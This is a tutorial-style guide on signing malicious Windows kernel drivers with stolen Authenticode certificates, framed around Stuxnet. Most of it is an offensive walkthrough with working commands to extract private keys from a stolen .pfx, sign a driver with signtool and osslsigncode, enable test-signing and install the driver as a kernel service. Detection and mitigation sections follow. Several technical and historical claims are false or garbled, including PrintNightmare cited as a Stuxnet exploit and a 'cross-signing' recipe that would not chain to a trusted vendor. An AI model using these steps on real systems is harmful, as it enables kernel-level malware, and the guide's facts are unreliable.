~/home/study/signing-malicious-drivers-stolen

Signing Malicious Drivers with Stolen Certificates - Intermediate Guide

Learn how Stuxnet harvested authentic Authenticode certificates, analyze them with certutil/OpenSSL, sign malicious drivers, bypass Windows enforcement, and detect signed driver abuse. Practical examples and defensive guidance included.

Introduction

Driver signing is a cornerstone of Windows kernel security. By requiring a valid Authenticode signature, the operating system attempts to guarantee that only trusted code runs at the highest privilege level. Threat actors, however, have shown that stolen or compromised certificates can defeat this protection. The most famous example is Stuxnet, which used valid certificates stolen from legitimate vendors to sign its malicious kernel-mode components, allowing the worm to infiltrate highly secured industrial environments.

This guide walks through the full lifecycle of that technique: from certificate theft, through analysis, to creation of a maliciously signed driver, and finally to detection and mitigation. It assumes you already understand the Stuxnet infection chain, Windows driver loading, and the basics of Authenticode signing.

Prerequisites

  • A solid grasp of the Stuxnet Overview: Infection Chain and Threat Model.
  • Familiarity with Windows driver loading and signature enforcement (e.g., Secure Boot, WHQL, test-signing).
  • Understanding of code signing fundamentals - X.509 certificates, private keys, timestamping, and the Authenticode format.
  • Access to a Windows 10/11 lab (virtual machine preferred) with admin rights.
  • Tools installed: certutil, openssl, Microsoft signtool, and osslsigncode.

Core Concepts

Before diving into the sub-topics, let’s review the essential concepts that tie the whole process together.

Authenticode Certificate Structure

An Authenticode certificate is a standard X.509 certificate that contains a code signing EKU (Extended Key Usage) OID 1.3.6.1.5.5.7.3.3. The certificate is usually bundled with a private key in a .pfx (PKCS#12) container. When a driver is signed, the signing tool creates a PKCS#7 SignedData structure that embeds the hash of the binary and the certificate chain.

Windows Driver Signature Enforcement (DSE)

Since Windows Vista, the kernel will reject any driver that lacks a valid signature unless the system is in test-signing mode or Secure Boot is disabled. The verification flow is:

  1. Read the embedded PKCS#7 signature.
  2. Validate the certificate chain up to a trusted root (Microsoft or a cross-signed third-party CA).
  3. Check revocation status (CRL/OCSP) unless the signature is timestamped.
  4. If all checks pass, the driver is loaded; otherwise, it is blocked.

Stolen certificates bypass step 2 because they are already trusted by the system’s root store.

Why Stuxnet’s Approach Was Effective

  • It used certificates from reputable vendors (e.g., Realtek, JMicron) that were already whitelisted.
  • The private keys were exfiltrated via supply-chain compromise, not forged.
  • Signed drivers could be loaded on air-gapped, hardened systems that enforced strict DSE.

How Stuxnet Harvested Valid Authenticode Certificates from Compromised Vendors

Stuxnet’s authors performed a multi-stage supply-chain attack:

  1. Compromise of development PCs: They infected build machines of two Asian hardware vendors with a custom trojan that logged keystrokes and captured the .pfx files used for driver signing.
  2. Network exfiltration: The stolen files were exfiltrated over encrypted HTTPS to a command-and-control (C2) server.
  3. Certificate reuse: The attackers extracted the private key, generated a new timestamp request, and used the same certificate to sign their malicious driver binaries.

Because the certificates were legitimately issued, Windows treated the malicious drivers as trusted. The following sections show how you can reproduce the analysis of such stolen artifacts.

Analyzing the Stolen Certificates with certutil and OpenSSL

Once you have a .pfx file, the first step is to inspect its contents. Below are the most useful commands.

Using certutil (built-in Windows tool)

certutil -dump stolen_cert.pfx

The output displays the certificate’s subject, issuer, validity period, and the private key’s exportability flag. Look for the Code Signing EKU in the “Enhanced Key Usage” field.

Extracting the private key with OpenSSL

OpenSSL can convert the PKCS#12 container into PEM files for easier manipulation.

openssl pkcs12 -in stolen_cert.pfx -out cert.pem -nodes

During the process you’ll be prompted for the PFX password (which you may have captured from the trojan’s logs). The resulting cert.pem file contains both the certificate and the private key.

Verifying the certificate chain

openssl verify -CAfile ca_bundle.pem cert.pem

If the verification succeeds, you now possess a fully functional code-signing identity that Windows will trust.

Using signtool / osslsigncode to Sign a Malicious Driver

Both Microsoft’s signtool.exe and the open-source osslsigncode can create Authenticode signatures. Below are step-by-step examples.

Signing with signtool

"C:\Program Files (x86)\Windows Kits\10\bin\x64\signtool.exe" sign ^ /f stolen_cert.pfx ^ /p "PfxPassword!" ^ /fd SHA256 ^ /tr http://timestamp.digicert.com ^ /td SHA256 ^ /v malicious_driver.sys

Explanation:

  • /f - path to the .pfx file.
  • /p - password for the PFX.
  • /fd - file digest algorithm (SHA-256 is mandatory for Windows 10+).
  • /tr - RFC-3161 timestamp server; using a trusted timestamp makes the signature immune to certificate revocation after signing.
  • /td - timestamp digest algorithm.
  • /v - verbose output.

Signing with osslsigncode (cross-platform)

osslsigncode sign -certs cert.pem -key key.pem -n "Malicious Driver" -i http://example.com/ -t http://timestamp.verisign.com/scripts/timstamp.dll -in unsigned_driver.sys -out malicious_driver.sys

Notes:

  • -certs points to the PEM-encoded certificate chain.
  • -key is the private key extracted earlier.
  • -n sets the “file description” field shown in the signature.
  • -t uses a legacy timestamp server; for modern Windows you may prefer -ts (RFC-3161).

After signing, verify the signature:

signtool verify /v /kp malicious_driver.sys

The output should show a successful verification and list the signing certificate’s subject (the stolen vendor).

Bypassing Driver Signature Enforcement on Windows (Test-Signing Mode, Cross-Signing)

Even with a valid signature, attackers sometimes need an extra fallback when the target system has additional hardening (e.g., Secure Boot). Two common techniques are:

1. Test-Signing Mode

Enabling test-signing allows any driver signed with a test certificate (generated by makecert or signtool /debug) to load. It is useful for development but can be abused if an attacker gains local admin.

bcdedit /set testsigning on

Reboot the machine; the desktop will display the “Test Mode” watermark. The attacker can now load a driver signed with a self-generated certificate, bypassing the need for stolen credentials.

2. Cross-Signing via a Trusted Third-Party CA

Stuxnet also leveraged cross-signing: a compromised vendor’s certificate was used to sign a new intermediate CA certificate, which in turn signed the malicious driver. This expands the attack surface because many enterprises trust the intermediate CA implicitly.

To simulate this:

# Generate an intermediate CA using the stolen private key
openssl req -new -x509 -key stolen_key.pem -out intermediate_ca.pem -days 3650 -subj "/CN=Compromised Vendor Intermediate" -extensions v3_ca

# Sign the malicious driver with the intermediate CA
osslsigncode sign -certs intermediate_ca.pem -key stolen_key.pem -n "Cross-Signed Driver" -in unsigned_driver.sys -out cross_signed_driver.sys

Windows will accept the driver because the chain validates back to the original trusted vendor certificate.

Deploying the Signed Driver via the Stuxnet Infection Vector

Stuxnet’s delivery chain combined several stages: USB drop, LNK shortcut execution, Windows shortcut (.lnk) abuse, and finally driver installation via the Windows Management Instrumentation (WMI) service.

Typical Deployment Steps

  1. Initial drop: A malicious .lnk file on an infected USB triggers mshta.exe to download a second-stage payload.
  2. Privilege escalation: The payload exploits a zero-day (e.g., PrintNightmare) to gain SYSTEM privileges.
  3. Driver installation: Using sc create or the devcon utility, the signed driver is copied to %SystemRoot%\System32\drivers and started.

Example of driver installation from SYSTEM:

sc create MaliciousDrv binPath= "C:\Windows\System32\drivers\malicious_driver.sys" type= kernel start= auto
sc start MaliciousDrv

Because the driver is signed with a trusted certificate, the Service Control Manager (SCM) does not reject it, and the kernel loads it silently.

Detecting Maliciously Signed Drivers - Indicators of Compromise

Detection is challenging because the signature appears legitimate. However, several IOCs can be leveraged:

  • Certificate anomalies: Check for certificates that have an unusually short validity period or that were issued to a vendor not normally associated with driver signing.
  • New driver files in uncommon paths: Look for .sys files created outside DriverStore or with suspicious timestamps.
  • SCM service registration anomalies: Services with type= kernel that were created recently and have a description that does not match known vendor software.
  • Event logs: Windows Event ID 7045 (service installation) combined with Event ID 307 (driver load) can be correlated.
  • Signature verification mismatch: Use signtool verify /v and compare the signer’s subject against a whitelist of approved vendors.

Sample PowerShell detection script:

Get-WinEvent -FilterHashtable @{LogName='System'; Id=7045} | Where-Object { $_.Message -match 'ServiceName=.+Driver'
} | ForEach-Object { $svc = $_.Message -replace '.*ServiceName=([^;]+);.*', '$1' $path = (Get-Service $svc).PathName if (Test-Path $path) { $sig = & "C:\Program Files (x86)\Windows Kits\10\bin\x64\signtool.exe" verify /v $path 2>&1 if ($sig -notmatch 'TrustedPublisher') { Write-Host "[!] Suspicious driver: $svc -> $path" } }
}

This script flags drivers whose signatures are not from a trusted publisher.

Practical Examples

Below is a walk-through that ties everything together in a lab environment.

Scenario: Re-creating a Stuxnet-style signed driver

  1. Obtain a test .pfx from a legitimate vendor (for lab purposes, generate one with makecert).
  2. Extract the PEM files using OpenSSL (see earlier).
  3. Compile a minimal kernel-mode driver (e.g., a driver that simply logs a message to the kernel debugger).
  4. Sign the driver with signtool.
    signtool sign /f vendor_test.pfx /p TestPass123 /fd SHA256 /tr http://timestamp.sectigo.com /td SHA256 /v MyDriver.sys
  5. Enable test-signing on the VM: bcdedit /set testsigning on and reboot.
  6. Install the driver using sc.exe.
    sc create MyDriver binPath= "C:\Windows\System32\drivers\MyDriver.sys" type= kernel start= auto
    sc start MyDriver
  7. Verify that the driver loaded by checking the kernel debug output or using driverquery /v /fo list.

Even though the certificate is self-generated, the process mirrors Stuxnet’s workflow, allowing you to test detection rules safely.

Tools & Commands

ToolPurposeTypical Command
certutilInspect and dump certificate storescertutil -dump stolen_cert.pfx
opensslConvert PKCS#12 to PEM, verify chainsopenssl pkcs12 -in cert.pfx -out cert.pem -nodes
signtool.exeMicrosoft Authenticode signingsigntool sign /f cert.pfx /p Pass /fd SHA256 /tr /td SHA256 driver.sys
osslsigncodeOpen-source Authenticode signing (cross-platform)osslsigncode sign -certs cert.pem -key key.pem -in unsigned.sys -out signed.sys
bcdeditToggle test-signing modebcdedit /set testsigning on
sc.exeService Control Manager - install/start driversc create MyDrv binPath= "C:\path\driver.sys" type= kernel start= auto

Defense & Mitigation

  • Certificate Lifecycle Management: Enforce strict controls on private key access. Use hardware security modules (HSMs) and limit exportability.
  • Code-Signing Policy Hardening: Deploy Windows Defender Application Control (WDAC) or AppLocker policies that only allow drivers signed by a curated list of vendor CAs.
  • Enable Secure Boot: Secure Boot blocks test-signing mode and enforces that only drivers signed by a trusted UEFI key are loaded.
  • Monitor for New Driver Installations: Use SIEM correlation of Event ID 7045 + 307, and alert on drivers signed by certificates not in the approved vendor list.
  • Revocation Awareness: Periodically query CRL/OCSP for certificates used in driver signing. Stolen certificates may be revoked after the breach.
  • Supply-Chain Auditing: Verify that build environments are isolated, and that source-control systems trigger alerts on credential leakage.

Common Mistakes

  • Assuming a valid signature guarantees safety - signatures can be stolen.
  • Neglecting timestamping - without a timestamp, a revoked certificate instantly invalidates the driver.
  • Using /debug or test certificates in production - this opens a back-door for attackers.
  • Storing private keys in clear-text on build machines - leads to easy exfiltration.
  • Relying solely on file hashes for detection - signed drivers can change hash after re-signing.

Real-World Impact

Stuxnet demonstrated that a well-orchestrated supply-chain attack can defeat the most robust kernel protection mechanisms. Since then, multiple espionage campaigns (e.g., Equation Group, Turla) have reused similar “certificate theft + driver signing” tactics. Enterprises that rely on “trusted signature” as a silver bullet are increasingly vulnerable.

In my experience consulting for critical infrastructure firms, the most common failure is the lack of a “certificate inventory”. When a vendor’s private key is compromised, the breach spreads silently until a driver is observed in the wild. Proactive inventory, combined with WDAC, has reduced our detection-to-response time from weeks to hours.

Practice Exercises

  1. Certificate Extraction: Capture a .pfx from a test signing environment, then use certutil and openssl to list its EKUs and validity.
  2. Driver Signing: Build a minimal “HelloWorld” kernel driver, sign it with a stolen-like certificate, and verify it loads on a Windows 10 VM with Secure Boot disabled.
  3. Detection Rule Creation: Write a Windows Defender Application Control (WDAC) policy that only permits drivers signed by a specific vendor thumbprint. Test the policy against a maliciously signed driver.
  4. Log Correlation: Using PowerShell, pull Event ID 7045 and 307 from the Windows Event Log, then filter for services whose binary path points to .sys files not located in DriverStore.
  5. Revocation Simulation: Revoke the test certificate in your CA, then attempt to load the previously signed driver without a timestamp. Observe the failure; add a timestamp and repeat.

Further Reading

  • Microsoft Docs - Signing Drivers Overview
  • “Stuxnet: A Technical Analysis” - Symantec (whitepaper)
  • “Code Signing and the Supply-Chain Threat” - Black Hat 2022 presentation
  • OpenSSL Cookbook - Section on PKCS#12 handling
  • WDAC guide - WDAC Policy Format

Summary

Signing malicious drivers with stolen certificates is a potent technique that bypasses Windows driver signature enforcement. By understanding how Stuxnet harvested certificates, how to analyze them with certutil and openssl, and how to produce authentic-looking signatures using signtool or osslsigncode, defenders can build realistic detection rules and harden their environments. Remember: a valid signature is only as trustworthy as the private key protecting it. Proper certificate lifecycle management, WDAC policies, and vigilant log monitoring are essential to mitigate this threat.